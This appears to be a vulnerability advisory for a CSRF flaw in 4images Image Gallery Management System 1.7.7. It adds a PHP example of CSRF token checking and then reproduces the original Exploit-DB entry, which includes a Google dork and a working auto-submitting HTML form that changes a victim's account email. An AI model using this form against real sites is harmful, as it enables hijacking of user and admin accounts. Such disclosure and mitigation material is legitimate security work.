Vendor: Image Gallery Management System
By: Dmar al3noOoz
CVSS: 8.8 (HIGH)
CWE-352: Cross-Site Request Forgery (CSRF)
Product Name: Image Gallery Management System
Affected Version From: 1.7.7
Affected Version To: 1.7.7
Patch Exists: NO
Related CWE: N/A
CPE: 4homepages.de
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

4images – Image Gallery Management System – [CSRF] Change mail user or admin

A CSRF vulnerability exists in 4images - Image Gallery Management System version 1.7.7. It allows an attacker to change the email address of a user or admin by sending the victim a malicious link. The linked page contains a form with hidden fields that hold the new email address. When the victim visits the link, the form is submitted automatically and the email address is changed.

Mitigation:

The application should implement a CSRF token to verify the authenticity of the request.
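
One way to implement the token check described above, as an added example that is not 4images code: a per-session token is embedded in the profile form and verified before the updateprofile action is processed. The function names, the csrf_token field name and the sample inputs are assumptions; $session and $post stand in for $_SESSION and $_POST so the script runs from the command line.

```php
<?php
// Added example, not 4images code. Function names and the 'csrf_token'
// field name are assumptions made for illustration.

/** Return the per-session token, creating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every state-changing form the site renders. */
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES) . '"/>';
}

/** True only if the request carries the token bound to this session. */
function csrf_check(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // is_string() rejects array-valued parameters; hash_equals() compares in constant time.
    return is_string($supplied) && $expected !== ''
        && hash_equals($expected, $supplied);
}

/** Sketch of the updateprofile handler: refuse before touching any data. */
function handle_update_profile(array $session, array $post): string
{
    if (!csrf_check($session, $post)) {
        return 'rejected: missing or wrong CSRF token';
    }
    return 'accepted: email change may proceed';
}

// Constructed inputs for the demonstration.
$session = [];
echo csrf_field($session), PHP_EOL;
// Cross-site form post as in the advisory: the fields arrive without a token.
$forged = ['action' => 'updateprofile', 'user_email' => 'new@example.test', 'user_email2' => 'new@example.test'];
// The same post sent from the site's own form, which includes csrf_field().
$legit = $forged + ['csrf_token' => $session['csrf_token']];
echo handle_update_profile($session, $forged), PHP_EOL;
echo handle_update_profile($session, $legit), PHP_EOL;
```

A page on another origin cannot read the victim's session token, so the auto-submitting form cannot supply a matching value.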

Exploit-DB raw data:

########################################################################################################
# Title: 4images - Image Gallery Management System - [CSRF] Change mail user or admin  

# Author: Dmar al3noOoz  

# Mail : wafee_s[at]hotmail.com 

# Name : 4images - Image Gallery Management System

# dork : Google Dork: "4images - Image Gallery Management System"

# Software Link : http://www.4homepages.de

# Version: 1.7.7  
##############################################  Exploit  ##############################################  

<html>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "1062" );

function pausecomp(millis)
{
    var date = new Date();
    var curDate = null;

    do { curDate = new Date(); }
    while(curDate-date < millis);
}

function fireForms()
{
    var count = 1;
    var i=0;
    
    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
        
        pausecomp(pauses[i]);
    }
}
    
</script>
<form method="POST" name="form0" action="http://www.XXXXXX.com/patch/member.php">
<input type="hidden" name="user_email" value="you mail"/>
<input type="hidden" name="user_email2" value="you mail"/>
<input type="hidden" name="action" value="updateprofile"/>
</form>
</body>
</html>


